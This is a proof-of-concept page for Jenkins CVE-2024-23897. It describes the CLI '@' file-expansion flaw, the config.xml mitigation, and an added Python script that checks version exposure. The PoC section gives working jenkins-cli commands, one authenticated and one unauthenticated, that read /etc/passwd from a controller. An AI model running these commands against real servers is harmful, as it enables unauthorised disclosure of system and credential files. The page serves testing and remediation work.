
CVE-2024-23897 PoC — Jenkins security vulnerability

Source
Associated Vulnerability
Title: Jenkins security vulnerability (CVE-2024-23897)
Description:Jenkins 2.441 and earlier, LTS 2.426.2 and earlier does not disable a feature of its CLI command parser that replaces an '@' character followed by a file path in an argument with the file's contents, allowing unauthenticated attackers to read arbitrary files on the Jenkins controller file system.
Description
In this GitHub repository you can find all the information on CVE-2024-23897.
Readme
# PoC-jenkins-rce_CVE-2024-23897.
<h2>In this GitHub repository you can find all the information on CVE-2024-23897.</h2>

<div align="center">
  <img src="https://github.com/iota4/PoC-jenkins-rce_CVE-2024-23897./blob/main/1200px-Jenkins_logo.svg.png" alt="logo-jenkins">
</div>
<h3>Introduction</h3>

The issue, assigned the CVE identifier CVE-2024-23897, has been described as an arbitrary file read vulnerability through the built-in command line interface. The CLI command parser has a feature that replaces an @ character followed by a file path in an argument with the file's contents (expandAtFiles). This feature is enabled by default, and Jenkins 2.441 and earlier and LTS 2.426.2 and earlier do not disable it.

<h3>PoC</h3>


For this PoC, I have installed Jenkins 2.426.2 with Docker to test the exploit of the vulnerability.
```
docker run -p 8080:8080 -p 50000:50000 -v jenkins_home:/var/jenkins_home jenkins/jenkins:2.426.2
```

After creating a user and a password, I downloaded the Jenkins CLI client (jenkins-cli.jar) on my attacking machine.
<div align="center">
  <img src="https://github.com/iota4/PoC-jenkins-rce_CVE-2024-23897./blob/main/jenkins-java.png" alt="screen1">
</div>


Then, I wrote the command for the exploit.
In this command, we need to have the credentials of the Jenkins user.
```
java -jar jenkins-cli.jar -s http://192.168.1.45:8080/ -auth "user:aze+123" connect-node "@/etc/passwd"
```

<div align="center">
  <img src="https://github.com/iota4/PoC-jenkins-rce_CVE-2024-23897./blob/main/Screenshot%20from%202024-01-27%2015-32-50.png" alt="screen2">
</div>


Another command allows displaying the first lines of a file without authentication.
```
java -jar jenkins-cli.jar -noCertificateCheck -s 'http://192.168.1.45:8080' help "@/etc/passwd"
```

<div align="center">
  <img src="https://github.com/iota4/PoC-jenkins-rce_CVE-2024-23897./blob/main/noauth.png" alt="screen3">
</div>

<h3>Fix the vulnerability</h3>

To counter this vulnerability, you need to navigate to the Jenkins configuration file named config.xml (in my case, it is located in my Docker container, so I switch to shell mode in my container)


<div align="center">
  <img src="https://github.com/iota4/PoC-jenkins-rce_CVE-2024-23897./blob/main/jenkins-resolve.png" alt="screen4">
</div>
and add the line:

```
<expandAtFiles>false</expandAtFiles>
```
and restart Jenkins:
```
service jenkins restart
```
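The two facts a defender needs from the sections above are the affected version ranges (Jenkins 2.441 and earlier, LTS 2.426.2 and earlier) and the config.xml setting this README uses as its mitigation. The following script is an added example, not code from this repository or from the Jenkins project: it parses Jenkins version strings, compares weekly and LTS lines separately so that a fixed LTS release such as 2.426.3 is not mistaken for an old weekly build, and checks whether a config.xml explicitly carries `<expandAtFiles>false</expandAtFiles>`. It assumes the element is placed directly under the `<hudson>` root, as in the fix described above; the two sample configs are constructed for the example.

```python
"""Assess a Jenkins controller for CVE-2024-23897 exposure (added example).

Two checks, both derived from the text of the page:
  * the running version against the affected ranges quoted from the advisory
    (Jenkins 2.441 and earlier, LTS 2.426.2 and earlier);
  * whether config.xml carries the <expandAtFiles>false</expandAtFiles>
    setting the README adds as its mitigation.
"""
import re
import xml.etree.ElementTree as ET

# Upper bounds of the affected ranges, taken from the advisory text on this page.
MAX_AFFECTED_WEEKLY = (2, 441)      # weekly releases have two components
MAX_AFFECTED_LTS = (2, 426, 2)      # LTS releases have three components

VERSION_RE = re.compile(r"\d+\.\d+(?:\.\d+)?")


def parse_version(version: str) -> tuple:
    """Turn '2.441' or '2.426.2' into a comparable tuple of integers."""
    version = version.strip()
    if not VERSION_RE.fullmatch(version):
        raise ValueError(f"unrecognised Jenkins version string: {version!r}")
    return tuple(int(part) for part in version.split("."))


def is_affected_version(version: str) -> bool:
    """True when the version falls inside an affected range.

    LTS and weekly lines are compared separately: LTS 2.426.3 (fixed) must not
    be treated as older than weekly 2.441 (affected) just because 426 < 441.
    """
    parts = parse_version(version)
    if len(parts) == 3:
        return parts <= MAX_AFFECTED_LTS
    return parts <= MAX_AFFECTED_WEEKLY


def expand_at_files_disabled(config_xml: str) -> bool:
    """True when config.xml explicitly sets <expandAtFiles>false</expandAtFiles>.

    Assumption: the element sits directly under the <hudson> root, which is
    where the README above adds it. A missing element or any other value
    counts as not disabled, because the feature is enabled by default.
    """
    root = ET.fromstring(config_xml)
    node = root.find("expandAtFiles")
    return node is not None and (node.text or "").strip().lower() == "false"


def assess(version: str, config_xml: str) -> dict:
    """Combine both checks into one verdict suitable for an inventory report."""
    affected = is_affected_version(version)
    disabled = expand_at_files_disabled(config_xml)
    return {
        "version": version.strip(),
        "affected_version": affected,
        "expand_at_files_disabled": disabled,
        # Exposed only when the release is affected and the mitigation is absent.
        "exposed": affected and not disabled,
    }


# Constructed sample configs for the example (not captured from a real controller).
CONFIG_DEFAULT = """<?xml version='1.0' encoding='UTF-8'?>
<hudson>
  <version>2.426.2</version>
  <numExecutors>2</numExecutors>
</hudson>
"""

CONFIG_MITIGATED = """<?xml version='1.0' encoding='UTF-8'?>
<hudson>
  <version>2.426.2</version>
  <numExecutors>2</numExecutors>
  <expandAtFiles>false</expandAtFiles>
</hudson>
"""


if __name__ == "__main__":
    for label, cfg in (("default", CONFIG_DEFAULT), ("mitigated", CONFIG_MITIGATED)):
        print(label, assess("2.426.2", cfg))
    print("fixed LTS", assess("2.426.3", CONFIG_DEFAULT))
```

In practice the version string comes from the `X-Jenkins` response header or the controller's own config.xml, and the config check is only meaningful on controllers that cannot yet be upgraded past the affected ranges; the version comparison is the primary indicator, the config check confirms that the workaround from this README has actually landed.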

File Snapshot

```
[4.0K] /data/pocs/874a012fda11e30fdca8f3019c05ecfb19cf4336
├── [ 69K] 1200px-Jenkins_logo.svg.png
├── [ 11K] free-jenkins-282182.png
├── [ 55K] jenkins-java.png
├── [102K] jenkins-resolve.png
├── [ 20K] noauth.png
├── [2.3K] README.md
└── [ 82K] Screenshot from 2024-01-27 15-32-50.png

0 directories, 7 files
```